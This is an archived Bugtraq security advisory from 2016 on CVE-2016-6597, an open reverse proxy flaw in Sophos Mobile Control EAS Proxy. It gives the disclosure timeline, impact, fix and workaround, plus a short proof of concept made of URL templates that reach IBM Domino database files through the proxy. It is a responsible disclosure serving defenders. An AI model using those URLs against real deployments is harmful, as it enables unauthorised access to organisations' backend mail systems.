lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <OF48A1B699.CB2A7665-ONC1258006.00315EF1-C1258006.0032C299@pallas.com>
Date: Fri, 5 Aug 2016 11:14:26 +0200
From: Tim Kretschmann <tim.kretschmann@...las.com>
To: bugtraq@...urityfocus.com
Subject: Sophos Mobile Control EAS Proxy Open Reverse Proxy vulnerability
 (CVE-2016-6597)

Application: Sophos Mobile Control EAS Proxy
Versions Affected: 3.5.0.3
Vendor URL: https://www.sophos.com/
Bugs: Open Reverse Proxy
Sent: 30.06.2016
Reported: 05.07.2016
Vendor response: 13.07.2016
Published BugFix by vendor: 28.07.2016 
Date of Public Advisory: 05.08.2016
Reference: Sophos Case #6061906
Author: Tim Kretschmann (Pallas GmbH)
Version and State of report: 0.9 ? PrePublic


Description


1. ADVISORY INFORMATION

Title: Sophos Mobile Control EAS Proxy Open Reverse Proxy vulnerability
Risk: high
Advisory URL: 
https://www.pallas.com/advisories/sophos_eas_open_reverse_proxy_vulnerability
Date published: 05.08.2016
Vendors contacted: Sophos


2. VULNERABILITY INFORMATION

Impact: access to any web-resources of the backend mail system, if Lotus 
Traveler option is enabled
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-6597 
CVSS Base Score v2: 8.6 / 10
CVSS Base Vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N


3. VULNERABILITY DESCRIPTION

Sophos EAS Proxy is part of the Enterprise Mobility Management (EMM) 
platform Sophos Mobile Control, which allows control of mail access for 
managed mobile devices.
Anonymous attackers can access any web-resources of the backend mail 
system like Microsoft Exchange or IBM Domino, if Lotus Traveler option is 
enabled. Brute force attacks against users in the backend mail system are 
also possible.


4. VULNERABLE PACKAGES

Sophos Mobile Control EAS Proxy Version 3.5.0.3
Other versions are probably affected too, but they were not checked.


5. SOLUTIONS AND WORKAROUNDS

Solution: Update to ?Sophos Mobile Control EAS Proxy 6.2.0.exe?
Workaround: Disable Lotus Traveler Option if possible, limit access on 
web-resources of backend mail system


6. AUTHOR

Tim Kretschmann (Pallas GmbH)


7. TECHNICAL DESCRIPTION

Proof of Concept for IBM Domino
https://<PublicIP_of_EASProxy>:<Port_of_EASProxy>/da.nsf
https://<PublicIP_of_EASProxy>:<Port_of_EASProxy>/dba4.nsf
https://<PublicIP_of_EASProxy>:<Port_of_EASProxy>/homepage.nsf 


8. ABOUT Pallas GmbH 

Pallas GmbH, located in Germany, provides managed and hosting services 
with focus on Security. 
Adress: Pallas GmbH, Hermuelheimer Str. 8a, 50321 Bruehl, GERMANY
Phone: 0049.2232.18960



--------------------------------------------------------------------
//// pallas
Pallas GmbH / Hermülheimer Str. 8a / 50321 Brühl
Geschäftsführer: Stephan Sachweh
HR B 52019 Amtsgericht Köln
--------------------------------------------------------------------
Managed Service - Einfach sicher

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ